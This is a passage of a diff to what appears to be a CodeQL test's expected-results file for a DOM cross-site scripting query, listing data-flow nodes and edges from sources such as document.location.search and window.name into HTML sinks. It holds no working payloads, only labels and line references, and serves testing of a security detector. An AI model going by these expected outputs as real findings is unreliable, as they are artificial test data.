target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:498:7:498:26 | source | semmle.label | source | +| tst.js:498:16:498:26 | window.name | semmle.label | window.name | +| tst.js:499:18:499:33 | unescape(source) | semmle.label | unescape(source) | +| tst.js:499:27:499:32 | source | semmle.label | source | | typeahead.js:9:28:9:30 | loc | semmle.label | loc | | typeahead.js:10:16:10:18 | loc | semmle.label | loc | | typeahead.js:20:13:20:45 | target | semmle.label | target | @@ -614,6 +646,8 @@ nodes | typeahead.js:21:12:21:17 | target | semmle.label | target | | typeahead.js:24:30:24:32 | val | semmle.label | val | | typeahead.js:25:18:25:20 | val | semmle.label | val | +| v-html.vue:2:8:2:23 | v-html=tainted | semmle.label | v-html=tainted | +| v-html.vue:6:42:6:58 | document.location | semmle.label | document.location | | various-concat-obfuscations.js:2:6:2:39 | tainted | semmle.label | tainted | | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | @@ -785,6 +819,20 @@ edges | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:71:13:71:61 | droppedHtml | provenance | | | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | provenance | | | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | provenance | Config | +| hana.js:11:37:11:40 | rows | hana.js:11:37:11:51 | rows[0].comment | provenance | | +| hana.js:16:37:16:40 | rows | hana.js:16:37:16:51 | rows[0].comment | provenance | | +| hana.js:19:37:19:40 | rows | hana.js:19:37:19:51 | rows[0].comment | provenance | | +| hana.js:22:37:22:38 | rs | hana.js:22:37:22:49 | rs[0].comment | provenance | | +| hana.js:38:31:38:32 | rs | hana.js:38:31:38:43 | rs[0].comment | provenance | | +| hana.js:43:33:43:41 | dummyRows | hana.js:43:33:43:52 | dummyRows[0].comment | provenance | | +| hana.js:44:33:44:42 | tablesRows | hana.js:44:33:44:53 | tablesR ... comment | provenance | | +| hana.js:50:33:50:41 | dummyRows | hana.js:50:33:50:52 | dummyRows[0].comment | provenance | | +| hana.js:51:33:51:42 | tablesRows | hana.js:51:33:51:53 | tablesR ... comment | provenance | | +| hana.js:70:33:70:36 | rows | hana.js:70:33:70:47 | rows[0].comment | provenance | | +| hana.js:73:33:73:36 | rows | hana.js:73:33:73:47 | rows[0].comment | provenance | | +| hana.js:84:35:84:43 | dummyRows | hana.js:84:35:84:54 | dummyRows[0].comment | provenance | | +| hana.js:85:35:85:43 | tableRows | hana.js:85:35:85:54 | tableRows[0].comment | provenance | | +| hana.js:90:33:90:34 | rs | hana.js:90:33:90:45 | rs[0].comment | provenance | | | jquery.js:2:7:2:40 | tainted | jquery.js:4:5:4:11 | tainted | provenance | | | jquery.js:2:7:2:40 | tainted | jquery.js:5:13:5:19 | tainted | provenance | | | jquery.js:2:7:2:40 | tainted | jquery.js:6:11:6:17 | tainted | provenance | | @@ -831,8 +879,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | jwt.js:4:36:4:39 | data | jwt.js:5:30:5:33 | data | provenance | | | jwt.js:5:9:5:34 | decoded | jwt.js:6:14:6:20 | decoded | provenance | | | jwt.js:5:19:5:34 | jwt_decode(data) | jwt.js:5:9:5:34 | decoded | provenance | | @@ -879,12 +927,12 @@ edges | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:5:9:5:14 | { id } | provenance | | | pages/[id].jsx:13:44:13:49 | params [id] | pages/[id].jsx:13:44:13:52 | params.id | provenance | | | pages/[id].jsx:16:44:16:49 | params [q] | pages/[id].jsx:16:44:16:51 | params.q | provenance | | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | pages/[id].jsx:3:30:3:35 | params [id] | provenance | | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | pages/[id].jsx:3:30:3:35 | params [q] | provenance | | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | pages/[id].jsx:3:30:3:35 | params [id] | provenance | | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | pages/[id].jsx:3:30:3:35 | params [q] | provenance | | | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | provenance | | -| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | provenance | | +| pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | provenance | | | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | provenance | | -| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | provenance | | +| pages/[id].jsx:26:10:26:36 | context ... r \|\| "" | pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:8:18:8:24 | tainted | provenance | | | react-native.js:7:7:7:33 | tainted | react-native.js:9:27:9:33 | tainted | provenance | | | react-native.js:7:17:7:33 | req.param("code") | react-native.js:7:7:7:33 | tainted | provenance | | @@ -943,8 +991,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | @@ -954,8 +1002,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | @@ -973,222 +1021,226 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
    ' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
    " | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
    " ...
